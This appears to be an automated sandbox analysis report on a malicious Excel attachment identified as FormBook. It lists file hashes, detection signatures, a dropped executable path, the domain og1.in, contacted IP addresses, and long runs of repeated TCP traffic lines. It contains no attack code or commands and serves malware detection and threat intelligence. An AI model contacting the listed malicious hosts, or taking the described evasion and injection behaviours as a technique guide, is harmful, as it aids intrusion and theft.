Windows Analysis Report
PI#0034250924.xla.xlsx

Overview

General Information

Sample name:	PI#0034250924.xla.xlsx
Analysis ID:	1522509
MD5:	7e28f8cffffe2ee9420b3ea7915101a4
SHA1:	83f9b8f410ed49d2de8fcee1d3659deb8d06adcf
SHA256:	2319aa2adb90c44bec9ad97f567b060722bdf5084e7f9b43c65b0feaee993227
Tags:	xlaxlsxuser-abuse_ch
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Benign windows process drops PE files

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected FormBook

.NET source code contains potential unpacker

Allocates memory in foreign processes

Document exploit detected (process start blacklist hit)

Excel sheet contains many unusual embedded objects

Injects a PE file into a foreign processes

Installs new ROOT certificates

Machine Learning detection for dropped file

Machine Learning detection for sample

Microsoft Office drops suspicious files

PowerShell case anomaly found

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: File With Uncommon Extension Created By An Office Application

Sigma detected: Potentially Suspicious PowerShell Child Processes

Sigma detected: Suspicious MSHTA Child Process

Sigma detected: Suspicious Microsoft Office Child Process

Sigma detected: WScript or CScript Dropper

Suspicious command line found

Suspicious powershell command line found

Windows Scripting host queries suspicious COM object (likely to drop second stage)

Writes to foreign memory regions

Allocates memory with a write watch (potentially for evading sandboxes)

Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)

Checks if the current process is being debugged

Compiles C# or VB.Net code

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected potential crypto function

Document contains embedded VBA macros

Document embeds suspicious OLE2 link

Drops PE files

Enables debug privileges

Found WSH timer for Javascript or VBS script (likely evasive script)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file does not import any functions

Potential document exploit detected (performs DNS queries)

Potential document exploit detected (performs HTTP gets)

Potential document exploit detected (unknown TCP traffic)

Queries the volume information (name, serial number etc) of a device

Searches for the Microsoft Outlook file path

Sigma detected: AspNetCompiler Execution

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Excel Network Connections

Sigma detected: Potential Binary Or Script Dropper Via PowerShell

Sigma detected: Suspicious Office Outbound Connections

Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Malware Threat Intel
Provided by

Name	Description	Attribution	Blogpost URLs	Link
Formbook, Formbo	FormBook contains a unique crypter RunPE that has unique behavioral patterns subject to detection. It was initially called "Babushka Crypter" by Insidemalware.	SWEED Cobalt	http://blog.inquest.net/blog/2018/06/22/a-look-at-formbook-stealer/ http://cambuz.blogspot.de/2016/06/form-grabber-2016-cromeffoperathunderbi.html http://www.vkremez.com/2018/01/lets-learn-dissecting-formbook.html https://0xmrmagnezi.github.io/malware%20analysis/FormBook/ https://any.run/cybersecurity-blog/xloader-formbook-encryption-analysis-and-malware-decryption/	https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook

Signatures

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe

Avira: detection malicious, Label: HEUR/AGEN.1332117

Multi AV Scanner detection for submitted file

Source: PI#0034250924.xla.xlsx	ReversingLabs: Detection: 18%
Source: PI#0034250924.xla.xlsx	Virustotal: Detection: 23%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 13.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.536381146.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.536316311.0000000000230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\temp_exec.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: PI#0034250924.xla.xlsx

Joe Sandbox ML: detected

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: unknown	HTTPS traffic detected: 172.67.216.244:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.78.54:443 -> 192.168.2.22:49167 version: TLS 1.2

Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.pdbhP\ source: powershell.exe, 00000007.00000002.517798504.00000000029D3000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: aspnet_compiler.exe
Source:	Binary string: 7C:\Users\user\AppData\Local\Temp\ao24xfvf\ao24xfvf.pdb source: powershell.exe, 00000007.00000002.517798504.00000000029D3000.00000004.00000800.00020000.00000000.sdmp

Software Vulnerabilities

Document exploit detected (process start blacklist hit)

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Windows\System32\mshta.exe

Potential document exploit detected (performs DNS queries)

Source: global traffic	DNS query: name: og1.in
Source: global traffic	DNS query: name: og1.in

Potential document exploit detected (performs HTTP gets)

Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49169 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443

Potential document exploit detected (unknown TCP traffic)

Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic	TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic	TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic	TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic	TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 172.67.216.244:443
Source: global traffic	TCP traffic: 172.67.216.244:443 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic	TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic	TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic	TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic	TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic	TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 104.21.78.54:443
Source: global traffic	TCP traffic: 104.21.78.54:443 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
Source: global traffic	TCP traffic: 192.168.2.22:49168 -> 104.168.7.7:80
Source: global traffic	TCP traffic: 104.168.7.7:80 -> 192.168.2.22:49168
